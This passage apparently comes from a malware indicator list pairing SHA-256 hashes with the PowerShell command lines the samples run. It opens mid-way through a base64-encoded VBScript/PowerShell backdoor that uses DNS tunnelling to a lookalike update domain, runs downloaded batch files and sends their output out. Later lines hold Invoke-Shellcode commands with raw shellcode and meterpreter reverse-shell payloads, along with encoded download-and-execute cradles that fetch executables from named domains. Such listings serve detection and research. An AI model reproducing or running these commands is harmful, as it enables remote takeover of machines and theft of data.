PTUUmImRuXCcrJHIrJy4tXycpfSIiIg0KQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikuUnVuIFJlcGxhY2UoRG93bmxvYWRFeGVjdXRlLCItXyIsImJhdCIpLDANCmtvbWM9InBvd2Vyc2hlbGwgLWV4ZWMgQnlwYXNzIC1GaWxlICImSE9NRSYia29taXNvdmEucHMxIg0KQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikuUnVuIGtvbWMsMA==')); Set-Content 'C:\Users\Public\Libraries\komisova.vbs' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGdsb2JhbDpteWhvc3QgPSAnLmdvb2dsZXVwZGF0ZS5kb3dubG9hZCcNCiRnbG9iYWw6ZmlsZW5hbWUgPSAnJw0KJGdsb2JhbDpteWZsYWcgPSAwDQokZ2xvYmFsOm15aWQgPSAnIyMjJw0KJGdsb2JhbDpteWhvbWUgPSAiJGVudjpcUHVibGljXExpYnJhcmllc1wiDQpmdW5jdGlvbiBjb252ZXJ0VG8tQmFzZTM2ICgkZGVjTnVtPSIiKQ0Kew0KICAgICRkZWNOdW0gJT0gNDY2NTYNCiAgICAkYWxwaGFiZXQgPSAiMDEyMzQ1Njc4OUFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaIg0KICAgIGRvDQogICAgew0KICAgICAgICAkcmVtYWluZGVyID0gKCRkZWNOdW0gJSAzNikNCiAgICAgICAgJGNoYXIgPSAkYWxwaGFiZXQuc3Vic3RyaW5nKCRyZW1haW5kZXIsMSkNCiAgICAgICAgJGJhc2UzNk51bSA9ICIkY2hhciRiYXNlMzZOdW0iDQogICAgICAgICRkZWNOdW0gPSAoJGRlY051bSAtICRyZW1haW5kZXIpIC8gMzYNCiAgICB9DQogICAgd2hpbGUgKCRkZWNOdW0gLWd0IDApDQogICAgJGJhc2UzNk51bS5QYWRMZWZ0KDMsJzAnKQ0KCX0NCgkNCgkNCglmdW5jdGlvbiBHZXRTdWIoJG15ZmxhZzMsICRjbWRpZD0nMDAnLCAkcGFydGlkPScwMDAnKQ0Kew0KICAgIGlmKCRteWZsYWczIC1lcSAwKQ0KICAgIHsNCiAgICAoJ3d3MDAwMDAwJysoY29udmVydFRvLUJhc2UzNihHZXQtUmFuZG9tIC1NYXhpbXVtIDQ2NjU1KSkpDQogICAgfQ0KICAgIGVsc2VpZigkbXlmbGFnMyAtZXEgMSkNCiAgICB7DQogICAgICAgICgnd3cnKyRnbG9iYWw6bXlpZCsnMDAwMDAnKyhjb252ZXJ0VG8tQmFzZTM2KEdldC1SYW5kb20gLU1heGltdW0gNDY2NTUpKSkNCiAgICB9DQogICAgZWxzZWlmKCRteWZsYWczIC1lcSAyKQ0KICAgIHsNCiAgICAgICAgKCd3dycrJGdsb2JhbDpteWlkKyRjbWRpZCskcGFydGlkKyhjb252ZXJ0VG8tQmFzZTM2KEdldC1SYW5kb20gLU1heGltdW0gNDY2NTUpKSkNCiAgICB9DQp9DQpmdW5jdGlvbiBTdHIySGV4KCRteXN0cikNCnsNCiAgICBbU3lzdGVtLkJpdENvbnZlcnRlcl06OlRvU3RyaW5nKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkRlZmF1bHQuR2V0Qnl0ZXMoJG15c3RyKSkuUmVwbGFjZSgiLSIsICIiKQ0KfQ0KZnVuY3Rpb24gQWxpdmUNCnsNCglpZigkZ2xvYmFsOm15aWQgLWVxICcjJysnIyMnKQ0KCXsNCgkJcmV0dXJuIDANCgl9DQogICAgU2VuZFJlY2VpdmVETlMgKChHZXRTdWIgMSkrJzMwJykNCiAgICAkc3ViID0gKChHZXRTdWIgMSkrJzIzMkEnKSArIChTdHIySGV4ICRnbG9iYWw6ZmlsZW5hbWUpDQogICAgJGkgPSAxDQogICAgJHJldCA9IDANCiAgICB3aGlsZSgkZ2xvYmFsOm15ZmxhZyAtZXEgMSkNCiAgICB7DQogICAgICAgICRyZXQgPSAxDQogICAgICAgICRzdWIyID0gJHN1YiArIChTdHIySGV4ICRpKQ0KICAgICAgICBTZW5kUmVjZWl2ZUROUyAkc3ViMg0KICAgICAgICAkaSsrDQogICAgfQ0KICAgIGlmKCRyZXQgLWVxIDEpDQogICAgew0KICAgICAgICBGaXhCYXRGaWxlICgkZ2xvYmFsOm15aG9tZSsndHBcJyskZ2xvYmFsOmZpbGVuYW1lKyIuYmF0IikNCiAgICB9DQogICAgJHJldA0KfQ0KDQpmdW5jdGlvbiBTZW5kUmVjZWl2ZUROUyAoJGQpDQp7DQoJJGNudCA9IDANCgl3aGlsZSAoJGNudCAtbHQgMjApDQoJew0KCQl0cnkNCgkJew0KCQkJJG15ZGF0YSA9IChbU3lzdGVtLk5ldC5ETlNdOjpHZXRIb3N0QnlOYW1lKCRkKyRnbG9iYWw6bXlob3N0KS5BZGRyZXNzTGlzdFswXSkNCgkJCSRteWRhdGEgPSAoJG15ZGF0YSB8IEZvckVhY2gtT2JqZWN0IHskXy5JUEFkZHJlc3NUb1N0cmluZ30pDQoJCQkkY250ID0gMjUNCgkJfQ0KCQljYXRjaA0KCQl7DQoJCQlTdGFydC1TbGVlcCAtbSA1MDANCgkJCSRjbnQrKw0KCQl9DQoJfQ0KICAgIGlmKC1ub3QoJGNudCAtZXEgMjUpKQ0KICAgIHsNCiAgICAgICAgKCcjJysnIyMnKQ0KICAgIH0NCiAgICBlbHNlaWYoJGdsb2JhbDpteWZsYWcgLWVxIDAgLWFuZCAkbXlkYXRhLlN0YXJ0c1dpdGgoJzMzLjMzLicpKQ0KICAgIHsNCiAgICAgICAgJHRtcCA9ICRteWRhdGEuU3ViU3RyaW5nKDYpLlNwbGl0KCcuJykNCiAgICAgICAgJGdsb2JhbDpmaWxlbmFtZSA9IChbY2hhcl0gW2ludF0gJHRtcFswXSkgKyAoW2NoYXJdIFtpbnRdICR0bXBbMV0pDQogICAgICAgICRnbG9iYWw6bXlmbGFnID0gMQ0KICAgIH0NCiAgICBlbHNlaWYgKCRteWRhdGEuRXF1YWxzKCczNS4zNS4zNS4zNScpKQ0KICAgIHsNCiAgICAgICAgJGdsb2JhbDpteWZsYWcgPSAwDQogICAgfQ0KICAgIGVsc2VpZiAoJGdsb2JhbDpteWZsYWcgLWVxIDEpDQogICAgew0KICAgICAgICAkdG1wID0gJG15ZGF0YS5TcGxpdCgnLicpDQogICAgICAgIFtTeXN0ZW0uSU8uRmlsZV06OkFwcGVuZEFsbFRleHQoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsiLmJhdCIsICgoW2NoYXJdIFtpbnRdICR0bXBbMF0pICsgKFtjaGFyXSBbaW50XSAkdG1wWzFdKSArIChbY2hhcl0gW2ludF0gJHRtcFsyXSkgKyAoW2NoYXJdIFtpbnRdICR0bXBbM10pKSkNCiAgICB9DQogICAgZWxzZWlmKCRnbG9iYWw6bXlpZCAtZXEgJyMnKycjIycpDQogICAgew0KICAgICAgICAoW2NoYXJdIFtpbnRdICRteWRhdGEuU3BsaXQoJy4nKVswXSkNCiAgICB9DQp9DQpmdW5jdGlvbiBGaXhCYXRGaWxlICgkYmF0cGF0aCkNCnsNCiAgICAoR2V0LUNvbnRlbnQgJGJhdHBhdGgpLlN1YnN0cmluZygxMCkgfCBTZXQtQ29udGVudCAkYmF0cGF0aA0KfQ0KZnVuY3Rpb24gU2VuZEZpbGUoJG15RmlsZVBhdGgpDQp7DQogICAgJG15RmlsZU5hbWUgPSBbU3lzdGVtLklPLlBhdGhdOjpHZXRGaWxlTmFtZVdpdGhvdXRFeHRlbnNpb24oJG15RmlsZVBhdGgpDQogICAgJG15c3RyID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbFRleHQoJG15RmlsZVBhdGgpDQogICAgJGk9MA0KICAgICRteXRlbXAgPSAnJw0KICAgICRqPTANCiAgICB3aGlsZSgkaSAtbGUgJG15c3RyLkxlbmd0aCkNCiAgICB7DQogICAgICAgICRteXRlbXAgKz0gJG15c3RyWyRpXQ0KICAgICAgICBpZigoKCRpJTI0KSAtZXEgMjMpIC1vciAoJGkgLWVxICRteXN0ci5MZW5ndGgpKQ0KICAgICAgICB7DQogICAgICAgICAgICAkbXloZXggPSBTdHIySGV4ICRteXRlbXANCiAgICAgICAgICAgIFNlbmRSZWNlaXZlRE5TICgoR2V0U3ViIDIgJG15RmlsZU5hbWUgKGNvbnZlcnRUby1CYXNlMzYgJGopKSArICRteWhleCkNCiAgICAgICAgICAgICRqKysNCiAgICAgICAgICAgICRteXRlbXAgPSAnJw0KICAgICAgICB9DQogICAgICAgICRpKysNCiAgICB9DQp9DQoNCmZ1bmN0aW9uIEdldElEDQp7DQogICAgJGdsb2JhbDpteWlkID0gU2VuZFJlY2VpdmVETlMgKChHZXRTdWIgMCkrJzMwJykNCn0NCg0KZnVuY3Rpb24gQ2hhbmdlVGhpc0ZpbGUgKCRib3RpZCkNCnsNCgkoR2V0LUNvbnRlbnQgJGVudjpQdWJsaWNcTGlicmFyaWVzXGtvbWlzb3ZhLnBzMSkgLXJlcGxhY2UgKCcjJysnIyMnKSwkYm90aWQgfCBTZXQtQ29udGVudCAkZW52OlB1YmxpY1xMaWJyYXJpZXNca29taXNvdmEucHMxDQp9DQoNCmZ1bmN0aW9uIEluaXQNCnsNCiAgICBpZigkZ2xvYmFsOm15aWQgLWVxICgnIycrJyMjJykpDQogICAgew0KCQltZCAtRm9yY2UgKCRnbG9iYWw6bXlob21lKyd0cFwnKQ0KCQlHZXRJRA0KCQlDaGFuZ2VUaGlzRmlsZSAkZ2xvYmFsOm15aWQNCiAgICB9DQp9DQpmdW5jdGlvbiBtYWluDQp7DQogICAgSW5pdA0KICAgIGlmKEFsaXZlIC1lcSAxKQ0KICAgIHsNCiAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gKCRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy5iYXQgPiAnKyRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy50eHQnKQ0KICAgICAgICBTZW5kRmlsZSAoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsnLnR4dCcpDQogICAgICAgIFJlbW92ZS1JdGVtICgkZ2xvYmFsOm15aG9tZSsndHBcJyskZ2xvYmFsOmZpbGVuYW1lKycuYmF0JykNCiAgICAgICAgUmVtb3ZlLUl0ZW0gKCRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy50eHQnKQ0KICAgIH0NCn0NCm1haW4NCg0K')); Set-Content 'C:\Users\Public\Libraries\komisova.ps1' $f;(Get-Content $env:Public\Libraries\komisova.vbs) -replace '__',(Get-Random) | Set-Content $env:Public\Libraries\komisova.vbs}" --> HOME="%public%\Libraries\"SERVER="http://googleupdate.download/update-index.aspx?req=__\"Dwn="powershell ""&{$wc=(new-object System.Net.WebClient);$wc.UseDefaultCredentials=$true;$wc.Headers.add('Accept','*/*');$wc.Headers.add('User-Agent','Microsoft BITS/7.7');while(1){try{$r=Get-Random;$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_');Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte;$cd=$wc.ResponseHeaders['Content-Disposition'];Rename-Item -path ('"&HOME&"dn\'+$r+'.-_') -newname ($cd.Substring($cd.IndexOf('filename=')+9))}catch{break}}}"""CreateObject("W__Script.S__hell").Run Replace(Dwn,"-_","dwn"),0DownloadExecute="powershell ""&{$wc=(new-object System.Net.WebClient);$wc.UseDefaultCredentials=$true;$wc.Headers.add('Accept','*/*');$wc.Headers.add('User-Agent','Microsoft BITS/7.7');$r=Get-Random;$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_');Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte;Invoke-Expression ('"&HOME&"dn\'+$r+'.-_ >"&HOME&"up\'+$r+'-_');$cd=$wc.ResponseHeaders['Content-Disposition'];Rename-Item -path ('"&HOME&"up\'+$r+'-_') -newname ($cd.Substring(($cd.IndexOf('filename=')+9),($cd.Length-25))+'.bat.txt');Get-ChildItem "&HOME&"up\ | ForEach-Object {if((Get-Item ($_.FullName)).length -gt 0){[System.Convert]::ToBase64String(([System.IO.File]::ReadAllBytes($_.FullName))) | Out-File $_.FullName;$wc.UploadFile('"&SERVER&"upl&m=u',$_.FullName);waitfor haha /T 3};Remove-Item $_.FullName};Remove-Item ('"&HOME&"dn\'+$r+'.-_')}"""CreateObject("W__Script.S__hell").Run Replace(DownloadExecute,"-_","bat"),0komc="powershell -exec Bypass -File "&HOME&"komisova.ps1"CreateObject("W__Script.S__hell").Run komc,0
  28. eab4489c2b2a8dcb0f2b4d6cf49876ea1a31b37ce06ab6672b27008fd43ad1ca
  29. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command iex (New-Object system.Net.WebClient).DownloadString(\""https://goo.gl/11XkCQ\"");Invoke-Shellcode -Force -Shellcode 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x0,0x0,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x7,0xff,0xd5,0xb8,0x90,0x1,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0x5,0x68,0xc0,0xa8,0x11,0x81,0x68,0x2,0x0,0x2,0x9a,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0xff,0x4e,0x8,0x75,0xec,0xe8,0x61,0x0,0x0,0x0,0x6a,0x0,0x6a,0x4,0x56,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x56,0x6a,0x0,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x0,0x56,0x53,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x22,0x58,0x68,0x0,0x40,0x0,0x0,0x6a,0x0,0x50,0x68,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0xc,0x24,0xe9,0x71,0xff,0xff,0xff,0x1,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xe0,0x1d,0x2a,0xa,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x53,0xff,0xd5
  30. e7780aab10e1ee068b0f120764e52753e6099c7601b0dca87998e1040fa21a2b
  31. C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('192.168.1.1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.1 -Lport 8080 -Force
  32. 84bab3fcd2999d67d98ce2a650e18e7065002c04f7c54b80daefaea1e8dbc47b
  33. C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/powershellmafia/powersploit/master/codeexecution/')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.16.1.29 -Lport 1652 -Force
  34. 2759f8165895bc0e91cde2c73a5b44ea8fcaa873db77932bd4fc4a46822ecd94
  35. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exe ByPass -Nol -Enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBtAHkAZgBlAGwAbwB3AC4AYwBvAG0ALwAxADQAMQAyAHQALgBnAGkAZgAnACwAIAAnAGMAOgBcAHUAcwBlAHIAcwBcAHAAdQBiAGwAaQBjAFwAdABlAHgAdABlAHgALgBlAHgAZQAnACkAOwBjADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAHQAZQB4AHQAZQB4AC4AZQB4AGUACgA= --> (new-object System.Net.WebClient).Downloadfile('http://myfelow.com/1412t.gif', 'c:\users\public\textex.exe');c:\users\public\textex.exe
  36. 244538d95e26fca7d606c1a5ace18514fd88ed22fa0e7989432ee7a460467383
  37. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exe ByPass -Nol -Enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBtAHkAZgBlAGwAbwB3AC4AYwBvAG0ALwBkAGYAdwBlAHcAZgAzAC4AZQB4AGUAJwAsACAAJwBjADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAHQAZQB4AG0AdABlAG0AcAAuAGUAeABlACcAKQA7AGMAOgBcAHUAcwBlAHIAcwBcAHAAdQBiAGwAaQBjAFwAdABlAHgAbQB0AGUAbQBwAC4AZQB4AGUACgA= --> (new-object System.Net.WebClient).Downloadfile('http://myfelow.com/dfwewf3.exe', 'c:\users\public\texmtemp.exe');c:\users\public\texmtemp.exe
  38. 9693d995b8d9cd523592b827b091d0d6e36198f376f864362077d0b4e724ce9f
  39. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://gap-alumni.org/cli/office365', $f);(New-Object -com W__Script.S__hell).Exec($f)
  40. 0519809f909c19e0699520852708f85a141b27a7aadf1ac77c2f2f3034b90e58
  41. 0619c810cebe9af31d48eb85c050733b6db3c5730fb9d5dce52e26df354ab33a
  42. 0abf7f1e3fcdd72bc2647ed897ee1e135787face2823c624cccf4f90df6d1a29
  43. 0d351ea41f8d80e2ab52249585214ee064c19e28048eb259f30e2599ea2aee72
  44. 0d4c2195535329a864aabad3c79cd9b3d97bae1cf7a1978fc74a9ade0bd42c73
  45. 0d594658f0ad4acf5c6a0b7e49f9a521d194e5a5dfe6830b96974f4fafac1f44
  46. 1b47e55fb39ff073f001c8193d53fe035da447bd26af00a23757eb3f7662fa02
  47. 271d172c2099f398ffe1e1c68b6150edf1aa66600e8cb617c9f70fe019293c29
  48. 284b44855a497783a41cae026553f3e16aaf55e8fa93709242d969f1ae195119
  49. 393261037fdd7506f56d32ad6f414ea1ac7b122ea42f084a176fd6b16e6e118e
  50. 3b97203d615f91cc242efdaccfaea5f90b57876b40911737122ca425a3724052
  51. 51a6a2bc922db42651d5c557e9e7c9a08b8c81eadeb8c27253c5014c6aa604d2
  52. 54edd5da4b800ef57e98e0c7ce8c66d0d26b68b847acd93202613d2e646df850
  53. 5e94271b248c9f5986aea8f2ffdfc6c5613157d8e5aa0b90a8fb4f07b26e4e93
  54. 5eff5e51c82c198e3428a96e69bc857e898670f327a00c47174021e216cfe4e8
  55. 62b81be00e239532cf6be4ea365075152843d0a5807962234c99b353a4e98661
  56. 63b43b84b2f796b0c4490639f4652defe7ced633998c4fb5795fec23d5ce4f84
  57. 647732f44730f4a68ee7f6ea4aa128b3ff4cc1151f15db4deb765435221b8284
  58. 6582ac8d48a69350d9f8112cd05fb432ad3b825722e4eab47af16d9eb3f102b6
  59. 6cec006e1307cc24b8620b2165842191b11a17cfdab4aac0217df5e31f6af7b5
  60. 6e9d586d810e50ff3f339504156606dae64ffeb1bf5b288542d732d8edd13064
  61. 703455acbfcdd7541de5f8584b11c078aff3ff1b09e37a29fdd6b6437afde8a3
  62. 754f96a4ec28eb6b7d8b22b80e7f6e0972a1aa6fb74c893c2f99d7e784adeb7a
  63. 7708fa809eebf5769bc904ff486294df7b048b7e5a550ab9b70a3aa4c7d5c6ef
  64. 7d8567d9acd996955b8da4efe48106016465788126ac47e8379d98c1cbdf11f9
  65. 896ffdd0f577fba7b416e00065e2d1cf38b9c4c579914a0badadab58ad5de67c
  66. a2ed3e2f140f8cca038b39e78764a8a6cf7a114c37d79bb74f2af4e3156fb84d
  67. ab16dea5d3a3cb06b7fb0fa46f037ffc1b450a97a2ef369f569fbf128b4e873e
  68. bfb674d4a5776c22c25f970099289aae43a6c5e934f12f1a2eb1ce40936d6459
  69. c1e28641e79abc7de11264aec413e5e441ccfcf489788809c6794e65374ab999
  70. c5e6ca0ef2f03cff1172a2f69e9c6a128a9b3bae61618eda6fafd5c075afad61
  71. cba527e4e0951a91ff8b6a55cb02d605612d23955694566f2011caf7e5233457
  72. d39a948afa25a96c87dd45b5e90ba39358987d80c1b0246529fb51fe52e9c323
  73. d40ba64e07861c6df70cc52b412f364a588cc443d0c44f04e7bdfafd8dbfe933
  74. d709e3f60aa1dfcb69cbe04fa5c1ceafbe21c4b39abfec74c1c76a129cbce964
  75. de7dd81eba4ddbef40249905489c962d25386df44f0feefb66404a92143b2ea4
  76. e1a94ac298a3c92918b9527a0545bbabb1fec2c2337563992a0150cf7d947a3f
  77. e74e31b0f849c71a59ab904307d9cd755960b6a43c147a82eb105534ff4894b8
  78. ee19bb89b1f5977dd01c7862a591c4c09be1b31d6764581e06142e4d43b3aed5
  79. f41722ceb289d133f87fcf1fa83ffc8a2f1a6a1835420541694912d81c0ebde4
  80. f9d3e7da223a144dfb71fdbfac4f832f8ab6044d00930eff83c1e36d686299ee
  81. fbcbf25e1a258446465b742fbfb70af22bef94250098886e40e4655259874e72
  82. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://nunziatella1787.eu/cli/update.bin', $f);(New-Object -com W__Script.S__hell).Exec($f)
  83. 6cfb487f650c8ed72e1f7e71c53b5755e19dbff16e016002b767cc36134bd2e9
  84. b0982eae864d749a7423f267b3292a3dedd7dc531288c68bee740b628ea5ef49
  85. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://pesupalvelu.fi/icon/microsoft/office365', $f);(New-Object -com W__Script.S__hell).Exec($f)
  86. 03dc09cc8e5b65981ddcce937a1f633f7f2770765795cbe0c67abeb0b77a4d57
  87. 26b8eccbbb05605c1119306f64e028a0e7fd8c80a29dbbbac8f333874d29bd93
  88. 2e13aae6e42dcdedc4c8596508a84b4f16bcfda5c47f23c50d01d37b73206c18
  89. 45f422eff22aecc3509769321d906133ae43a3ad75905fb89f217d61b6a31b5f
  90. 4906d1e3be099b1204dda91cd982ece11301519b6a69a5b6b53cd7423732bbde
  91. 727193c7d4e6cc7b7f12c1deb140c2547f42e30327997c14819ee76225305066
  92. 86a050ef4a4cf074d602700c9c81f491da0027f4d109c3df267607bf1cb18a53
  93. 8c98ef53f64bec41af4d374938a96b9e6a09412952923758a3331d0dbb52373c
  94. bf11c15620ba994106e7ba1ee12482b73d40a0a1a86654a1beaced129d1aee83
  95. cdf86f5f890312f147b579cc0d0a0ab60b9a21bf564068e45e1d96dc3fe1617b
  96. d9a081917e7559f4aaec08ec424e4aa9277b728e29bcde1ddd0a5b168da1227b
  97. e0ef9bfce57e94283b6c043da96743b5d7ebe4bdb16d87ef5a2d8f1f7c3e7a2d
  98. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com W__Script.S__hell).Exec($f)
  99. 00b6481fd53d85a0cd7b96f8dbd8da592fc3defe824ce35ac5f292b821a7fbe1
  100. 012455397dda8ae533e8c483074647468e68e797c3571615ef517f1f2b70f947
  101. 02156fea1ac144c296777174c85236dfdc2af194ca8ff8d4ca37d43f6f365044
  102. 0277298e605690a7c84096c662af6314c8c7a4093c69a5f92cfb18e599a0d5ed
  103. 03a6a4373f93bfb5ad0331503e099a2ef55f5cba5580a9354b878e75e3788bd4
  104. 03a7e4bbac9dc3498707da86fe16db9e5448010ca00ca57f50597bb896878bf1
  105. 0440511b9c2ed8511b7699955845298ba681d5c152c08917ff6bb31f227c1cb5
  106. 048fc07fb94a74990d2d2b8e92c099f3f986af185c32d74c857b07f7fcce7f8e
  107. 057119a5139d7c6e57edaa2fd75d7698b8d3d9450ddefdf378a76dca6265462a
  108. 068d802ee7ceb76d1c5fda9e5a21624dd176f5eb5fde122394a55ea3ec543334
  109. 069e3c309d1845681a245e8a0c7b58f224b09b095b29ebcc35c282191cba8d75
  110. 06c657a41b043ef702ad3d3d86e580cee8c75e2685084640f8862e95e0244f41
  111. 07314bd9a754522728616093e5030c6eec3c7ae1f7ee90b9729f390f59ad8705
  112. 08aed2fe9b14d9f59a03cdc44a8b062122c6abb022288ce64add42d0968fd5bb
  113. 09e03b00e389c0684aed7926156e9929c08b2f562421bf9d370aefc8e68999cd
  114. 0adf3b0ed1908a260f7286828940ddc0cadec2645341fde0c61bb08db3824115
  115. 0b61eb4b328cb6e3880098082d21d95a24639d75d40d5b4cdd9d16a06b3e3a3c
  116. 0b7704660ec8e9229645572ec3f9a10836dc0548f537197399f76f47136e505a
  117. 0b8b22a320571dff1777d0c583150f1186a5222874d6c73e6812605e618ad7e1
  118. 0b8d8ca825445c6aa481059fd5941d499493a8cbb07e359ccfe0207a8ee7e7dc
  119. 0bd64296bb0985199c11e916b3ef51ff332d390cd8de5c96711b8a780d007496
  120. 0c51cf3096b31b0fdbf57358c597a4ea036c00cadcaed73fdd9abc69c73ee964
  121. 0c8503750283753a9768d9092834ea2a6611daa1bdad7eb70a15d5eb1fdb3fdf
  122. 0f4a40239f65eb6a29b344d93398ac161081e0549881d0cc6275a60232b5143c
  123. 0f6b58f7751778bfb4231e43bbd282bef8bce8aa9b09e98cd6ada4fe6fe7e92c
  124. 0fa684998dbd19ed082230e5fe384d976f96e65d7d6546fc19ceb84a80f93bd6
  125. 0fd52d240115831ea538a54bef6bf74f6878041a21c77580cfa8a587affc326d
  126. 0ff6c5357296bff3a27bea929aa4b491dad875ff6a99263fe88086db6b7fb4d4
  127. 111f8f6bd51218a7eacd5c3aa0c785d69ff473764fcccee2f8b0937b00a4e597
  128. 12748f9cfaa28cd038162b13e301f4ad2653f15152283d2a19b5e871a1797a32
  129. 12c973bc10b3065410465edc3139d5449fd7cda4d3fc32e682be77c7c1b9266c
  130. 13b211e7ab402ad8afd213710db06addd9e83861eedda1d8a014b99d8c204adc
  131. 15080b5eac1ff3a1b17f0a989b5dfd85e1790c2fac815d49aec8bebad7f8a964
  132. 15517246a2d0e57f470fffcc278e9ede8ac65b2894616c4e37a8e43dfbf95ac9
  133. 164606f01d953afbfd0bf67cc26510c2943002ebe44f7a61067bb892735bc606
  134. 164c393f45bc3b8f8bb84725de0fc00b07d373188c453597ea8d41f414de0362
  135. 16b4a79e8d85d56d09ecdb2ecf059021d1bcef6f1cccc90390f3873f9fec99ba
  136. 1717bfaeb0fc745712e13946afb76bab30fc202774219f65d10043037a269769
  137. 17456da1f4485e867903b260a4584c9d57f5e7c5909f4c7b7381dcc38576345b
  138. 17760108e85e2463379cf4767e6ccd2bc9e6014dcc3bb92bff833e2ab3339f49
  139. 17a9c9dc164687bb7009f83af453cd40d3f9c2ed91a4eb5d155e6f6a7ad028e8
  140. 195acb0b71d7f5c2d21801f4d92f23e8805daf5a9f77ac855d1aa9fbaa63ee0f
